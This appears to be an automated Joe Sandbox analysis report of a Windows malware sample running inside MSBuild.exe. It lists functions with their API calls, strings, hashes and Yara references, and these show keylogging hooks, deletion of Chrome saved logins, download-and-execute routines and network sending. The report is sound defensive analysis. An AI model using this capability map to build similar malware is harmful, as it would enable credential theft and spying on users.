                                                Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                • String ID: Keylogger initialization failure: error $`#v
                                                • API String ID: 3219506041-3226811161
                                                • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2341273852-0
                                                • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$CreateFirstNext
                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                • API String ID: 341183262-3780268858
                                                • Opcode ID: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                • Opcode Fuzzy Hash: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                • API String ID: 2127411465-314212984
                                                • Opcode ID: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                • Opcode Fuzzy Hash: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                • API String ID: 2281282204-3981147832
                                                • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                • GetLastError.KERNEL32 ref: 0040B261
                                                Strings
                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                • UserProfile, xrefs: 0040B227
                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 2018770650-1062637481
                                                • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                • GetLastError.KERNEL32 ref: 00416B02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                  • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                • String ID:
                                                • API String ID: 4043647387-0
                                                • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                • String ID:
                                                • API String ID: 276877138-0
                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: PowrProf.dll$SetSuspendState
                                                • API String ID: 1589313981-1420736420
                                                • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstH_prologNext
                                                • String ID:
                                                • API String ID: 1157919129-0
                                                • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                • _free.LIBCMT ref: 00448067
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00448233
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                • String ID:
                                                • API String ID: 1286116820-0
                                                • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DownloadExecuteFileShell
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                • API String ID: 2825088817-2582742282
                                                • Opcode ID: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                • Opcode Fuzzy Hash: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNextsend
                                                • String ID: x@G$x@G
                                                • API String ID: 4113138495-3390264752
                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 4127273184-3576401099
                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 4212172061-0
                                                • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
